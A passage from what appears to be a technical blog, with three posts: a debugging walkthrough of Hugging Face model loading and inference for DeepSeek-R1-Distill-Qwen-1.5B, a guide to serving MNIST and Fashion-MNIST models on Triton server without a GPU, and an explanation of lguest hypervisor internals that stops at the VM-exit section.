首先通过 print(model) 看看模型的结构。可以看到 DeepSeek-R1-Distill-Qwen-1.5B 模型的vocab大小为151936， embedding大小为1536。

整个模型加载过程就是将safetensors中的权重加载到上面模型中。pytorch提供了保存和加载safetensors文件的方法，保存过程会保存模型的参数为一个json对象，叫做state_dict，再加载过程中则把这个state_dict加载到模型中。pytorch最终通过nn.Module.load_state_dict将模型参数加载到模型。本节梳理最开头AutoModelForCausalLM.from_pretrained与最终的nn.Module.load_state_dict的中间过程。

单步进入 AutoModelForCausalLM.from_pretrained 可以看到是进入了 _BaseAutoModelClass.from_pretrained，在该函数的最后，找到了model_class，并且调用其from_pretrained，从下面的调试截图可以看到该model_class是Qwen2ForCausalLM。

但是单步进去的时候，进去的是PreTrainedModel.from_pretrained，这说明Qwen2ForCausalLM是从PreTrainedModel中继承的from_pretrained。

在这个函数中继续往下走，到 cls._load_pretrained_model，这个函数_load_pretrained_model依然在PreTrainedModel中的。

_load_pretrained_model在开头不久即调用load_state_dict对safetensors文件中的权重进行加载。

在load_state_dict的return部分下个断点，可以看到模型文件的各个tensor已经加载到state_dict中。

ok，此时我们已经加载文件的state_dict了，接下来是把这个state_dict加载到模型中区。代码接下来是对这个key做一些调整，暂时不看。继续在_load_pretrained_model单步调试，走到调用_load_state_dict_into_meta_model的地方。

从调用_load_state_dict_into_meta_model的地方可以看到，这个函数应该就是将将参数加到模型的地方。

_load_state_dict_into_meta_model函数通过一个循环获取state_dict中的key, value。比如第一个参数’lm_head.weight’。

继续调试，到_load_parameter_into_model，这个函数的参数是model、param_name以及具体的param，所以应该就是将参数加载到模型的地方。果不其然，首先获取module，就是nn.Module，接着调用它的成员函数 load_state_dict。

这里稍微看看get_module_from_name是怎么工作的。可以看到前面是submodule名字。

从Module.get_submodule中可以看到，返回了一个Linear的Module，这个就是 lm_head。

经过上面的整个过程，我们就把AutoModelForCausalLM.from_pretrained和调用nn.Module.load_state_dict联系到了一起。整个过程简化如下：

AutoModelForCausalLM.from_pretrained
  ->_BaseAutoModelClass.from_pretrained
     ->PreTrainedModel.from_pretrained
         ->PreTrainedModel._load_pretrained_model
             ->load_state_dict(加载safetensors中的权重)
             ->_load_state_dict_into_meta_model
               ->_load_parameter_into_model
                 ->get_module_from_name(获取nn.Module)
                 ->module.load_state_dict(调用nn.Module.load_state_dict)
         

模型的整体推理过程

经过_load_state_dict_into_meta_model的循环，我们最终会把safetensors文件中的权重加载到模型中。下一步就是分析输入是如何在模型中进行forward的。

首先看tokenizer。

可以在模型文件的tokenizer.json中看到对应的含义。

继续单步，走一次model的forward，实际走到了Qwen2Model.forward函数。

首先调用self.embed_tokens将tokenizer之后的seq进行embedding，下面的截图展示了这个过程。可以看到seq embedding之后的inputs_embeds.shap为[1, 5, 1536]，这1表示batch_size，5表示sequence length，即token数，1536是embedding维度大小。

接着进行position embedding，给seq加上位置信息。

接下来在一个for循环中进入hidden layer，这个模型总共有28个hidden layer，for循环中调用decoder_layer进行输出，并且将上一层的输出(layer_outputs[0])作为下一层的输入(hidden_states)。

继续跟进decoder_layer，可以看到进入了Qwen2DecoderLayer.forward函数。这个函数就是transformer的核心部分了。比如norm层、自注意力层、残差层以及最后的全连接层。

这里无非就是将输入的hidden_states与刚刚加载到模型的参数相乘，最终得到outputs。

这里只简单看看自注意力层。以我目前初浅的理解，自注意力层是用来将输入seq的embedding做一个变形，使得变形后的embedding有同一个seq其他token的信息。所以体现到代码上就是输入一个hidden_states，然后内部计算出qkv矩阵进行计算，输出一个相同维度的hidden_states。

自注意力层通过Qwen2Attention实现。可以看到刚进来时候参数hidden_states就是token进行embedding的维度。接下来计算出qkv。

随后调用attention_interface计算自注意力，这个函数是sdpa_attention_forward。

sdpa_attention_forward这里是一个多头自注意力的计算，总共12个头，每个头使用embedding的128维。并且也看到了大名鼎鼎的scaled_dot_product_attention。

sdpa_attention_forward执行完成之后，attn_output.shape为[1, 5, 12, 128]分别表示batch_size为1， seq len为5，num of heads 为12，每个head dim为128。

回到Qwen2Attention.forward，多头自注意计算完成之后，要合并头。然后乘以一个o_proj。

回到Qwen2DecoderLayer.forward，进行完自注意计算self.self_attn之后就是全连接层。

本质还是矩阵相乘，最终输出output，最新的hidden_states放到了oututs[0]。

最终回到Qwen2Model.forward，这就完成了一次decode layer的计算。经过28次的decode计算，我们的Qwen2Model.forward也走到最后一步，BaseModelOutputWithPast，单步跟进该函数会最终会进入到Qwen2ForCausalLM.forward。

Qwen2ForCausalLM.forward中，会走一次lm_head这个Linear层，最终输出一个151936的大小的logits。

Qwen2ForCausalLM.forward最终返回CausalLMOutputWithPast对象。具体如下：

总结

本文是对学习推理过程的一些调试分析记录。通过这个过程从整体上了解了推理的流程。本质上推理框架就是将这个过程进行优化，尽可能的的快的进行预测。

Deploy a 'hello world' model serving using triton server without GPU

2025-04-05T00:00:00+00:00

The first is reproduced and modified from here. This uses fashion mnist dataset.

The second is made by my own. This uses the mnist dataset.

Deploy a fashion-mnist model serving

train the model

This train uses CPU.

            # python train.py --epoch 60


            import argparse
            import time
            import torch
            import torchvision
            from torch import nn

            ##device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

            device = torch.device('cpu')
            # 加载数据
            def load_data_fashion_mnist(batch_size, resize=None, root='data'):
            """Download the fashion mnist dataset and then load into memory."""
            trans = []
            if resize:
                    trans.append(torchvision.transforms.Resize(size=resize))
            trans.append(torchvision.transforms.ToTensor())
            # 图像增强
            transform = torchvision.transforms.Compose(trans)

            mnist_train = torchvision.datasets.FashionMNIST(root=root, train=True, download=True, transform=transform)
            mnist_test = torchvision.datasets.FashionMNIST(root=root, train=False, download=True, transform=transform)
            train_iter = torch.utils.data.DataLoader(mnist_train, batch_size=batch_size, shuffle=True)
            test_iter = torch.utils.data.DataLoader(mnist_test, batch_size=batch_size, shuffle=False)

            return train_iter, test_iter

            class GlobalAvgPool2d(nn.Module):
            # 全局平均池化层可通过将池化窗口形状设置成输入的高和宽实现
            def __init__(self):
                    super(GlobalAvgPool2d, self).__init__()
            def forward(self, x):
                    return nn.functional.avg_pool2d(x, kernel_size=x.size()[2:])

            class FlattenLayer(nn.Module):  #展平操作
            def forward(self, x):
                    return x.view(x.shape[0], -1)

            # 定义模型结构
            def model(show_shape=False) -> nn.modules.Sequential:
            # torch.nn.Sequential是一个Sequential容器，模块将按照构造函数中传递的顺序添加到模块中。
            model = nn.Sequential()
            model.add_module('convd1', nn.Sequential(
                    nn.Conv2d(1, 25, kernel_size=3),
                    nn.BatchNorm2d(25),
                    nn.ReLU(),
            ))

            model.add_module('maxpool1', nn.Sequential(
                    nn.MaxPool2d(kernel_size=2, stride=2)
            ))

            model.add_module('convd2', nn.Sequential(
                    nn.Conv2d(25, 50, kernel_size=3),
                    nn.BatchNorm2d(50),
                    nn.ReLU(),
            ))

            model.add_module('maxpool2', nn.Sequential(
                    nn.MaxPool2d(kernel_size=2, stride=2)
            ))

            model.add_module('fc', nn.Sequential(
                    FlattenLayer(),
                    nn.Linear(50*5*5, 1024),
                    nn.ReLU(),
                    nn.Linear(1024, 128),
                    nn.ReLU(),
                    nn.Linear(128, 10),
            ))

            if show_shape:
                    print(model)
                    print('打印 1*1*28*28 输入经过每个模块后的shape')
                    X = torch.rand((1, 1, 28, 28))
                    for name, layer in model.named_children():
                    X = layer(X)
                    print(name, ' output shape:\t', X.shape)

            return model

            # 评估函数
            def evaluate_accuracy(data_iter, net, device=torch.device('cpu')):
            """Evaluate accuracy of a model on the given data set."""
            acc_sum, n = torch.tensor([0], dtype=torch.float32, device=device), 0
            for X, y in data_iter:
                    # If device is the GPU, copy the data to the GPU.
                    X, y = X.to(device), y.to(device)
                    net.eval()
                    with torch.no_grad():
                    y = y.long()
                    # [[0.2 ,0.4 ,0.5 ,0.6 ,0.8] ,[ 0.1,0.2 ,0.4 ,0.3 ,0.1]] => [ 4 , 2 ]
                    acc_sum += torch.sum((torch.argmax(net(X), dim=1) == y))
                    n += y.shape[0]
            return acc_sum.item() / n

            # 训练启动入口
            def train_ch(net, model_path, train_iter, test_iter, criterion, num_epochs, device, lr=None):
            """Train and evaluate a model with CPU or GPU."""
            print('training on', device)
            net.to(device)
            optimizer = torch.optim.SGD(net.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4)  # 优化函数
            best_test_acc = 0
            for epoch in range(num_epochs):
                    train_l_sum = torch.tensor([0.0], dtype=torch.float32, device=device)
                    train_acc_sum = torch.tensor([0.0], dtype=torch.float32, device=device)
                    n, start = 0, time.time()
                    for X, y in train_iter:
                    net.train()

                    optimizer.zero_grad()  # 清空梯度
                    X, y = X.to(device), y.to(device)
                    y_hat = net(X)
                    loss = criterion(y_hat, y)
                    loss.backward()
                    optimizer.step()

                    with torch.no_grad():
                            y = y.long()
                            train_l_sum += loss.float()
                            train_acc_sum += (torch.sum((torch.argmax(y_hat, dim=1) == y))).float()
                            n += y.shape[0]
                    test_acc = evaluate_accuracy(test_iter, net, device)  # 测试验证集
                    print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'
                    % (epoch + 1, train_l_sum / n, train_acc_sum / n, test_acc, time.time() - start))
                    if test_acc > best_test_acc:
                    print('find best! save at %s' % model_path)
                    best_test_acc = test_acc
                    # 一般情况下是用该方式保存模型
                    # torch.save(net, model_path)

                    # 本实验将模型保存成 torchscript
                    traced_script = torch.jit.script(net)
                    traced_script.save(model_path)

            if __name__ == "__main__":
            parser = argparse.ArgumentParser(prog='minist',description='训练脚本')
            parser.add_argument('--device', type=str, default='cpu')
            parser.add_argument('--lr', type=float, default=0.0001)
            parser.add_argument('--epoch', type=int, default=1)
            parser.add_argument('--batch', type=int, default=256)
            parser.add_argument('--model_path', type=str, default='model.pt')
            args = parser.parse_args()

            lr, num_epochs = args.lr, args.epoch
            device = args.device
            batch = args.batch
            path = args.model_path

            criterion = nn.CrossEntropyLoss()
            train_iter, test_iter = load_data_fashion_mnist(batch)
            net = model()
            train_ch(net, path, train_iter, test_iter, criterion, num_epochs, device, lr)

deploy in triton server

prepare triton model file

We need prepare a directory for triton server.

            model_repository/
            -- model_pt
            | -- 1/
            |    | -- model.pt
            | -- config.pbtxt

The ‘model.pt’ is the file we saved in train phase. The ‘config.pbtxt’ is as follows.

            name: "model_pt"               # 模型名，也是目录名
            platform: "pytorch_libtorch"   # 模型对应的平台，本次使用的是torch，不同格式的对应的平台可以在官方文档找到
            #backend: "torch"               # 此次 backend 和上面的 platform，至少写一个，用途一致tensorrt/onnxruntime/pytorch/tensorflow
            input [
            {
            name: "input0"             # 输入名字
            data_type: TYPE_FP32       # 类型，torch.long对应的就是int64, 不同语言的tensor类型与triton类型的对应关系可以在官方文档找到
            dims: [ -1, 1, 28, 28 ]    # -1 代表是可变维度
            }
            ]
            output [
            {
            name: "output0"            # 输出名字
            data_type: TYPE_FP32
            dims: [ -1, 10 ]
            }
            ]
            instance_group [
            {
            kind: KIND_CPU           # 指定运行平台
            }
            ]

The ‘dims’ in ‘input’ and ‘output’ is the dimension of input tensor and output tensor.

start triton server

            # step 1: download tritonserver
            docker pull ngc.nju.edu.cn/nvidia/tritonserver:24.12-py3

            # step 2: create model repository
            mkdir model_repository

            # step 3: prepare file
            cd model_repository
            mkdir 1
            cp ~/model.pt 1/
            cp ~/config.pbtxt .

            # step 4: run triton server
            docker run --name tritonserver     --rm     -it       -p 8000:8000    -p 8002:8002    -v $PWD/model_repository:/models    ngc.nju.edu.cn/nvidia/tritonserver:24.12-py3 bash
            tritonserver --model-repository=/models

If we start triton server successfully we will see following output.

            I0405 11:46:43.713902 379 grpc_server.cc:2558] "Started GRPCInferenceService at 0.0.0.0:8001"
            I0405 11:46:43.714439 379 http_server.cc:4725] "Started HTTPService at 0.0.0.0:8000"
            I0405 11:46:43.756857 379 http_server.cc:358] "Started Metrics Service at 0.0.0.0:8002"

send request to triton server

calculate the accuracy

Just as the origin post, we create a script to calculate the accuracy.

            import time
            import torch
            import torchvision
            import requests

            # 省略，和前面一样
            def load_data_fashion_mnist(batch_size, resize=None, root='data'):
            trans = []
            if resize:
                    trans.append(torchvision.transforms.Resize(size=resize))
            trans.append(torchvision.transforms.ToTensor())
            # 图像增强
            transform = torchvision.transforms.Compose(trans)

            mnist_train = torchvision.datasets.FashionMNIST(root=root, train=True, download=True, transform=transform)
            mnist_test = torchvision.datasets.FashionMNIST(root=root, train=False, download=True, transform=transform)
            train_iter = torch.utils.data.DataLoader(mnist_train, batch_size=batch_size, shuffle=True)
            test_iter = torch.utils.data.DataLoader(mnist_test, batch_size=batch_size, shuffle=False)

            return train_iter, test_iter


            device = torch.device('cpu')
            triton_host = 'http://192.168.0.118:8000/v2/models/model_pt/versions/1/infer'

            def infer(imgs: torch.Tensor):
            data = imgs.tolist()
            request_data = {
                    "inputs": [{
                    "name": "input0",
                    "shape": [len(data), 1, 28, 28],
                    "datatype": "FP32",
                    "data": data,
                    }],
                    "outputs": [{
                    "name": "output0",
                    }]
            }
            res = requests.post(url=triton_host,json=request_data).json()
            output_data = res['outputs'][0]['data']
            n = 10
            # 将子列表组成二维数组
            result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
            return torch.tensor(result, device='cpu')

            # 测试模型
            correct = 0
            total = 0
            _, test_iter = load_data_fashion_mnist(128)

            start_time = time.time()
            with torch.no_grad():
            for imgs, labels in test_iter:
                    # 将输入数据移动到正确的设备
                    imgs, labels = imgs.to(device), labels.to(device)
                    outputs = infer(imgs)
                    _, predicted = torch.max(outputs, 1)
                    total += labels.size(0)
                    correct += (predicted == labels).sum().item()
            end_time = time.time()

            # 打印准确率
            accuracy = 100 * correct / total
            print(f'总数：{total:d} 准确率: {accuracy:.2f}%')
            print(f"耗时: {(end_time - start_time):.2f}s")

classcify one picture

First convert the ubyte file to image.

            import os
            from skimage import io
            import torchvision
            import torchvision.datasets.mnist as mnist

            root="fashion_mnist"
            train_set = (
            mnist.read_image_file(os.path.join(root, 'train-images-idx3-ubyte')),
            mnist.read_label_file(os.path.join(root, 'train-labels-idx1-ubyte'))
                    )
            test_set = (
            mnist.read_image_file(os.path.join(root, 't10k-images-idx3-ubyte')),
            mnist.read_label_file(os.path.join(root, 't10k-labels-idx1-ubyte'))
                    )
            print("training set :",train_set[0].size())
            print("test set :",test_set[0].size())

            def convert_to_path(name):
            # 将名称转为小写，替换特殊字符为路径安全字符
            return name.lower().replace('/', '_').replace(' ', '_')

            # 原始标签映射
            label_mapping = {
            0: 'T-shirt/top',
            1: 'Trouser',
            2: 'Pullover',
            3: 'Dress',
            4: 'Coat',
            5: 'Sandal',
            6: 'Shirt',
            7: 'Sneaker',
            8: 'Bag',
            9: 'Ankle boot'
            }

            # 生成路径安全的字典
            path_safe_mapping = {key: convert_to_path(value) for key, value in label_mapping.items()}


            def convert_to_img(train=True):
            if(train):
                    f=open(root+'train.txt','w')
                    data_path=root+'/train/'
                    if(not os.path.exists(data_path)):
                    os.makedirs(data_path)
                    for i, (img,label) in enumerate(zip(train_set[0],train_set[1])):
                    img_path=data_path+path_safe_mapping[int(label)] +"_"+str(i)+'.jpg'
                    io.imsave(img_path,img.numpy())
                    f.write(img_path+' '+str(label)+'\n')
                    f.close()
            else:
                    f = open(root + 'test.txt', 'w')
                    data_path = root + '/test/'
                    if (not os.path.exists(data_path)):
                    os.makedirs(data_path)
                    for i, (img,label) in enumerate(zip(test_set[0],test_set[1])):
                    img_path = data_path+ path_safe_mapping[int(label)] +"_"+str(i) + '.jpg'
                    io.imsave(img_path, img.numpy())
                    f.write(img_path + ' ' + str(label) + '\n')
                    f.close()

            convert_to_img(True)
            convert_to_img(False)

Random choice some pics.

Using following code to send one picture to triton server to infer the class.

            import time
            import torch
            import torchvision
            import requests
            from PIL import Image
            from torch import nn,save,load
            from torch.optim import Adam
            from torch.utils.data import DataLoader
            from torchvision import datasets, transforms
            import sys



            triton_host = 'http://192.168.0.118:8000/v2/models/model_pt/versions/1/infer'

            def infer(imgs: torch.Tensor):
            data = imgs.tolist()
            request_data = {
                    "inputs": [{
                    "name": "input0",
                    "shape": [len(data), 1, 28, 28],
                    "datatype": "FP32",
                    "data": data,
                    }],
                    "outputs": [{
                    "name": "output0",
                    }]
            }
            res = requests.post(url=triton_host,json=request_data).json()
            output_data = res['outputs'][0]['data']
            n = 10
            # 将子列表组成二维数组
            result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
            return torch.tensor(result, device='cpu')


            def convert_to_path(name):
            # 将名称转为小写，替换特殊字符为路径安全字符
            return name.lower().replace('/', '_').replace(' ', '_')

            # 原始标签映射
            label_mapping = {
            0: 'T-shirt/top',
            1: 'Trouser',
            2: 'Pullover',
            3: 'Dress',
            4: 'Coat',
            5: 'Sandal',
            6: 'Shirt',
            7: 'Sneaker',
            8: 'Bag',
            9: 'Ankle boot'
            }

            # 生成路径安全的字典
            path_safe_mapping = {key: convert_to_path(value) for key, value in label_mapping.items()}



            img = Image.open(sys.argv[1])
            img_transform = transforms.Compose([transforms.ToTensor()])
            img_tensor = img_transform(img).unsqueeze(0).to('cpu')
            print (img_tensor.shape)
            output = infer(img_tensor)
            print(output)
            predicted_label = torch.argmax(output)
            print(f"Predicted label: {path_safe_mapping[int(predicted_label)]}")

As we can see the prediction of ‘ankel_boot’ and ‘‘sneaker’ is right but the ‘coat’ is wrong.

Deploy a mnist model serving

train the model

I using this code to do the train phase.

            import torch
            from torch import nn,save,load
            from torch.optim import Adam
            from torch.utils.data import DataLoader
            from torchvision import datasets, transforms


            transform = transforms.Compose([transforms.ToTensor()])
            train_dataset = datasets.MNIST(root="data", download=True, train=True, transform=transform)
            train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)


            class ImageClassifier(nn.Module):
            def __init__(self):
                    super(ImageClassifier, self).__init__()
                    self.conv_layers = nn.Sequential(
                    nn.Conv2d(1, 32, kernel_size=3),
                    nn.ReLU(),
                    nn.Conv2d(32, 64, kernel_size=3),
                    nn.ReLU(),
                    nn.Conv2d(64, 64, kernel_size=3),
                    nn.ReLU()
                    )
                    self.fc_layers = nn.Sequential(
                    nn.Flatten(),
                    nn.Linear(64 * 22 * 22, 10)
                    )

            def forward(self, x):
                    x = self.conv_layers(x)
                    x = self.fc_layers(x)
                    return x


            device = torch.device("cpu")
            classifier = ImageClassifier().to('cpu')


            optimizer = Adam(classifier.parameters(), lr=0.001)
            loss_fn = nn.CrossEntropyLoss()


            for epoch in range(10):  # Train for 10 epochs
            for images, labels in train_loader:
                    images, labels = images.to(device), labels.to(device)
                    optimizer.zero_grad()  # Reset gradients
                    outputs = classifier(images)  # Forward pass
                    loss = loss_fn(outputs, labels)  # Compute loss
                    loss.backward()  # Backward pass
                    optimizer.step()  # Update weights

            print(f"Epoch:{epoch} loss is {loss.item()}")

            traced_script = torch.jit.script(classifier)
            traced_script.save("model_state.pt")

deploy in triton server

Create a ‘model_mnist’ directory in ‘model_repository’ and create ‘1’ directory in ‘model_mnist’.

The ‘config.pbtxt’ is as follows:

name: "model_mnist"               # 模型名，也是目录名
platform: "pytorch_libtorch"   # 模型对应的平台，本次使用的是torch，不同格式的对应的平台可以在官方文档找到
#backend: "torch"               # 此次 backend 和上面的 platform，至少写一个，用途一致tensorrt/onnxruntime/pytorch/tensorflow
input [
  {
    name: "input0"             # 输入名字
    data_type: TYPE_FP32       # 类型，torch.long对应的就是int64, 不同语言的tensor类型与triton类型的对应关系可以在官方文档找到
    dims: [1,  1, 28, 28 ]    # -1 代表是可变维度
  }
]
output [
  {
    name: "output0"            # 输出名字
    data_type: TYPE_FP32
    dims: [1, 10 ]
  }
]
instance_group [
    {
      kind: KIND_CPU           # 指定运行平台
    }
]

Then start the triton server.

send request to triton server

First convert the ubyte file to image.

import numpy as np
import struct
 
from PIL import Image
import os
 
data_file = 't10k-images-idx3-ubyte' #需要修改的路径
 
# It's 7840016B, but we should set to 7840000B
data_file_size = 7840016
data_file_size = str(data_file_size - 16) + 'B'
 
data_buf = open(data_file, 'rb').read()
 
magic, numImages, numRows, numColumns = struct.unpack_from(
    '>IIII', data_buf, 0)
datas = struct.unpack_from(
    '>' + data_file_size, data_buf, struct.calcsize('>IIII'))
datas = np.array(datas).astype(np.uint8).reshape(
    numImages, 1, numRows, numColumns)
 
label_file = 't10k-labels-idx1-ubyte'#需要修改的路径
 
# It's 10008B, but we should set to 10000B
label_file_size = 10008
label_file_size = str(label_file_size - 8) + 'B'
 
label_buf = open(label_file, 'rb').read()
 
magic, numLabels = struct.unpack_from('>II', label_buf, 0)
labels = struct.unpack_from(
    '>' + label_file_size, label_buf, struct.calcsize('>II'))
labels = np.array(labels).astype(np.int64)
 
datas_root = 'mnist_test' #需要修改的路径
 
if not os.path.exists(datas_root):
    os.mkdir(datas_root)
 
for i in range(10):
    file_name = datas_root + os.sep + str(i)
    if not os.path.exists(file_name):   
        os.mkdir(file_name)
 
for ii in range(numLabels):
    img = Image.fromarray(datas[ii, 0, 0:28, 0:28])
    label = labels[ii]
    file_name = datas_root + os.sep + str(label) + os.sep + \
        'mnist_test_' + str(label) + "_"+str(ii) + '.png'
    img.save(file_name)

Using following code to send one picture to triton server.

import time
import torch
import torchvision
import requests
from PIL import Image
from torch import nn,save,load
from torch.optim import Adam
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
import sys

device = torch.device('cpu')
triton_host = 'http://192.168.0.118:8000/v2/models/model_mnist/versions/1/infer'

def infer(imgs: torch.Tensor):
    data = imgs.tolist()
    request_data = {
        "inputs": [{
            "name": "input0",
            "shape": [1, 1, 28, 28],
            "datatype": "FP32",
            "data": data,
        }],
        "outputs": [{
            "name": "output0",
        }]
    }
    res = requests.post(url=triton_host,json=request_data).json()
    print(res)
    output_data = res['outputs'][0]['data']
    n = 10
    # 将子列表组成二维数组
    result = [output_data[i:i+n] for i in range(0, len(output_data), n)]
    return torch.tensor(result, device='cpu')

img = Image.open(sys.argv[1])
img_transform = transforms.Compose([transforms.ToTensor()])
img_tensor = img_transform(img).unsqueeze(0).to('cpu')
print (img_tensor.shape)
output = infer(img_tensor)
print(output)
predicted_label = torch.argmax(output)
print(f"Predicted label: {predicted_label}")

As we can see all prediction is right.

Ref

lguest internals

2025-03-01T00:00:00+00:00

lguest is the simpliest x86 virtualization solution. It is a paravirt hypervisor. In this post I will dive deep into the internals of lguest.

Related files

tools/lguest/lguest.c， lguest userspace tool just like QEMU.

drivers/lguest/core.c, the core code of lguest hypervisor, including the module initialization.

drivers/lguest/hypercalls.c, hypercall related handler.

drivers/lguest/interrupts_and_traps.c，guest interrupt code.

drivers/lguest/lguest_user.c, the /dev/lguest devices related code to interact with the userspace tool.

drivers/lguest/page_table.c, mostly the shadow page table management.

drivers/lguest/segments.c, the guest idt/gdt related code.

drivers/lguest/x86/core.c, the x86 arch code, the regs setup the entry to switcher.

drivers/lguest/x86/switcher_32.S, switcher code.

drivers/lguest is just like kvm code in kernel.

arch/x86/lguest is the guest code.

arch/x86/lguest/boot.c, lguest guest related code, like subarch init, pv ops.

arch/x86/lguest/head_32.S, the assembly code of lguest guest.

lguest architecture overview

Following pic shows the architecture of lguest. It contains three key components: the guest, the switcher and the lg.ko.

The guest kernel runs on hardware ring 1 and the guest userspace runs on hardware ring 3. The switcher is used to ‘switching’ the worlds between host, guest user and guest kernel. The world switches can be triggered by a set of events such as interrupts and exceptions. The switcher comprises efficient and concise assembly code maped to identical address within host and guest kernel address spaces. The lg.ko contains the the core hypervisor code. It exposes interface(/dev/lg) to userspace. It prepare guest environment and launch the guest and also process the guest exit events.

Switcher

Swticher is used to do world switch. It must be located at identical virtual address in guest kernel and host. The guest user and kernel share the same page table just like the traditional Linux. When load lg.ko, it will call ‘map_switcher’ to map the switcher code to host. The allocation contains TOTAL_SWITCHER_PAGES pages.

            #define TOTAL_SWITCHER_PAGES (1 + 2 * nr_cpu_ids)

            static __init int map_switcher(void)
            {
            ...
                    lg_switcher_pages = kmalloc(sizeof(lg_switcher_pages[0])
                                            * TOTAL_SWITCHER_PAGES,
                                            GFP_KERNEL);
            ...
            }

Every physical CPU will has two pages, these two pages is used to load and store vCPU state. Following show lg_switcher_pages layout.

The really switcher page is just one page, and following it is per cpu two pages.

            /* We have two pages shared with guests, per cpu.  */
            struct lguest_pages {
                    /* This is the stack page mapped rw in guest */
                    char spare[PAGE_SIZE - sizeof(struct lguest_regs)];
                    struct lguest_regs regs;

                    /* This is the host state & guest descriptor page, ro in guest */
                    struct lguest_ro_state state;
            } __attribute__((aligned(PAGE_SIZE)));

            /* This is a guest-specific page (mapped ro) into the guest. */
            struct lguest_ro_state {
                    /* Host information we need to restore when we switch back. */
                    u32 host_cr3;
                    struct desc_ptr host_idt_desc;
                    struct desc_ptr host_gdt_desc;
                    u32 host_sp;

                    /* Fields which are used when guest is running. */
                    struct desc_ptr guest_idt_desc;
                    struct desc_ptr guest_gdt_desc;
                    struct x86_hw_tss guest_tss;
                    struct desc_struct guest_idt[IDT_ENTRIES];
                    struct desc_struct guest_gdt[GDT_ENTRIES];
            };

The ‘spare’ and ‘regs’ field combines the stack for switcher. The ‘regs’ contains the guest register value. The ‘state’ field is used to store host and guest state information.

CPU virtualization

Without hardware support, the guest traps to host in two ways: hypercall and interrupt/execption. The hypercall is implemented via interrupt.

Following pic shows the process of VM Exit and VM Entry. When the guest execute interrupt such as interrupt-based syscall or execption, the CPU transitions to swithcher code (in h_ring0) through the pre-defined handler in IDTR. In the switcher it first store the guest state and then restore the host state and then switch to host by calling switch_to_host. After completing the exit events the host call the switcher function switch_to_guest to enter guest, this will store the host state and load guest state.

VM entry

In ‘lguest_arch_host_init’ the ‘lguest_entry’ struct is initialized as following:

            lguest_entry.offset = (long)switch_to_guest + switcher_offset();
            lguest_entry.segment = LGUEST_CS;

The ‘offset’ is set to ‘switch_to_guest’ address. Then in ‘run_guest_once’, it will be used as the operand of lcall instruction.

            asm volatile("pushf; lcall *%4"
                    /*
                    * This is how we tell GCC that %eax ("a") and %ebx ("b")
                    * are changed by this routine.  The "=" means output.
                    */
                    : "=a"(clobber), "=b"(clobber)
                    /*
                    * %eax contains the pages pointer.  ("0" refers to the
                    * 0-th argument above, ie "a").  %ebx contains the
                    * physical address of the Guest's top-level page
                    * directory.
                    */
                    : "0"(pages), 
                    "1"(__pa(cpu->lg->pgdirs[cpu->cpu_pgd].pgdir)),
                    "m"(lguest_entry)
                    /*
                    * We tell gcc that all these registers could change,
                    * which means we don't have to save and restore them in
                    * the Switcher.
                    */
                    : "memory", "%edx", "%ecx", "%edi", "%esi");

This lcall will goto ‘switch_to_guest’ which is some assembly code. These code will do the host-guest switch. Before lcall is executed, ‘pushf’ pushs the elfags into host stack. The ‘lcall’ instruction will push ‘cs’ and ‘eip’ to host stack. At the start of ‘switch_to_guest’ the ‘es/ds/gs/fs/ebp’ is pushed into host stack and the ‘esp’ is stored in ‘lguest_pages’ state->host_cr3. After this, the host state is stored. Then we will load the guest state.

First we change the stack to switcher’s stack.

            movl	%eax, %edx
            addl	$LGUEST_PAGES_regs, %edx
            movl	%edx, %esp

Here ‘eax’ points the beginning of ‘lguest_pages’. After these instruction, the ‘esp’ point to beginning of ‘lguest_regs’. Then the switcher loads the guest IDT/GDT/TSS, the most usage of TSS is used to specify the ss/esp when the guest exit to host.

            // The Guest's GDT we so carefully
            // Placed in the "struct lguest_pages" before
            lgdt	LGUEST_PAGES_guest_gdt_desc(%eax)

            // The Guest's IDT we did partially
            // Copy to "struct lguest_pages" as well.
            lidt	LGUEST_PAGES_guest_idt_desc(%eax)

            // The TSS entry which controls traps
            // Must be loaded up with "ltr" now:
            // The GDT entry that TSS uses 
            // Changes type when we load it: damn Intel!
            // For after we switch over our page tables
            // That entry will be read-only: we'd crash.
            movl	$(GDT_ENTRY_TSS*8), %edx
            ltr	%dx

            // Look back now, before we take this last step!
            // The Host's TSS entry was also marked used;
            // Let's clear it again for our return.
            // The GDT descriptor of the Host
            // Points to the table after two "size" bytes
            movl	(LGUEST_PAGES_host_gdt_desc+2)(%eax), %edx
            // Clear "used" from type field (byte 5, bit 2)
            andb	$0xFD, (GDT_ENTRY_TSS*8 + 5)(%edx)

Before switch to guest, we need to set the guest’ cr3.

            // Once our page table's switched, the Guest is live!
            // The Host fades as we run this final step.
            // Our "struct lguest_pages" is now read-only.
            movl	%ebx, %cr3

Then we restore the guest state. Notice we have changed the cr3, so following code is actully executed in guest space address. This is why we need to map the switcher to the same address in both host and guest kernel.

            // The page table change did one tricky thing:
            // The Guest's register page has been mapped
            // Writable under our %esp (stack) --
            // We can simply pop off all Guest regs.
            popl	%eax
            popl	%ebx
            popl	%ecx
            popl	%edx
            popl	%esi
            popl	%edi
            popl	%ebp
            popl	%gs
            popl	%fs
            popl	%ds
            popl	%es

            // Near the base of the stack lurk two strange fields
            // Which we fill as we exit the Guest
            // These are the trap number and its error
            // We can simply step past them on our way.
            addl	$8, %esp

            // The last five stack slots hold return address
            // And everything needed to switch privilege
            // From Switcher's level 0 to Guest's 1,
            // And the stack where the Guest had last left it.
            // Interrupts are turned back on: we are Guest.
            iret

After the ‘addl’ instruction, The ‘esp’ points to ‘errorcode’ field in the stack page, and the last five just fake a iret frame. At the first time, the register is initialized to following value.

            void lguest_arch_setup_regs(struct lg_cpu *cpu, unsigned long start)
            {
            ...
            regs->ds = regs->es = regs->ss = __KERNEL_DS|GUEST_PL;
                    regs->cs = __KERNEL_CS|GUEST_PL;
            ...
                    regs->eflags = X86_EFLAGS_IF | X86_EFLAGS_FIXED;
            ...
                    regs->eip = start;
            ...
            }

The ‘eip’ is set from userspace, it is the vmlinx ELF ‘e_entry’ which is ‘statup_32’ in ‘arch/x86/kernel/head_32.S’ file. The ‘esp’ is not set as the stack is set by the guest OS.

VM exit

